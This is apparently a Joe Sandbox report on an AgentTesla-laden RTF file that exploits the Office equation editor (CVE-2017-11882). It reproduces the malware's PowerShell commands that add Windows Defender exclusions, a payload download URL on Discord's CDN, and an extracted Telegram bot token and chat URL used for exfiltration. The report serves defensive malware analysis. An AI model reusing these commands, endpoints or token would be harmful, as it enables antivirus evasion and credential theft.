Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report order-confirmation.doc__.rtf

Overview

General Information

Sample Name:order-confirmation.doc__.rtf
Analysis ID:425839
MD5:3d081d1bd8aa121b56754528d7b13981
SHA1:87db49098bc0aa0b88dfa5c7f3954544dd3058df
SHA256:4435554b4906c5a294e08a579a0bd6e7ae78bd0dcce24a7225a29ab2a731bd28
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • srt.exe (PID: 2692 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
      • powershell.exe (PID: 2328 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3028 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3000 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2172 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 2888 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
        • powershell.exe (PID: 2160 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 1572 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2028 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 1664 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • srt.exe (PID: 1916 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
      • srt.exe (PID: 2656 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 2612 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
    • powershell.exe (PID: 3016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2232 cmdline: 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            38.2.svchost.exe.4053840.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              38.2.svchost.exe.4053840.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.159.130.233, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Roaming\srt.exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\srt.exe, CommandLine: C:\Users\user\AppData\Roaming\srt.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\srt.exe, NewProcessName: C:\Users\user\AppData\Roaming\srt.exe, OriginalFileName: C:\Users\user\AppData\Roaming\srt.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ProcessId: 2692
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 2692, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, ProcessId: 2328

                      Malware Analysis System Evasion:

                      barindex
                      Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 2692, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, ProcessId: 3028

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: order-confirmation.doc__.rtfAvira: detected
                      Found malware configurationShow sources
                      Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: order-confirmation.doc__.rtfReversingLabs: Detection: 40%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\srt.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.3028.5597425ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000006.00000002.2100253520.00000000002C5000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2328.5596582ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000004.00000002.2098522265.00000000006BB000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2102530848.0000000002A80000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\Jump to behavior
                      Source: global trafficDNS query: name: cdn.discordapp.com
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 162.159.130.233:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.159.130.233:80
                      Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1Connection: Keep-AliveHost: cdn.discordapp.com
                      Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                      Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4C9C3-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1Connection: Keep-AliveHost: cdn.discordapp.com
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: srt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: srt.exe, 00000003.00000002.2184172162.0000000006901000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: srt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/
                      Source: srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\srt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01D0B2EE NtQuerySystemInformation,4_2_01D0B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01D0B2CC NtQuerySystemInformation,4_2_01D0B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01D5B2EE NtQuerySystemInformation,6_2_01D5B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01D5B2CC NtQuerySystemInformation,6_2_01D5B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_01DFB2EE NtQuerySystemInformation,8_2_01DFB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_01DFB2CC NtQuerySystemInformation,8_2_01DFB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01EDB2EE NtQuerySystemInformation,10_2_01EDB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01EDB2CC NtQuerySystemInformation,10_2_01EDB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01B9B2EE NtQuerySystemInformation,13_2_01B9B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01B9B2CC NtQuerySystemInformation,13_2_01B9B2CC
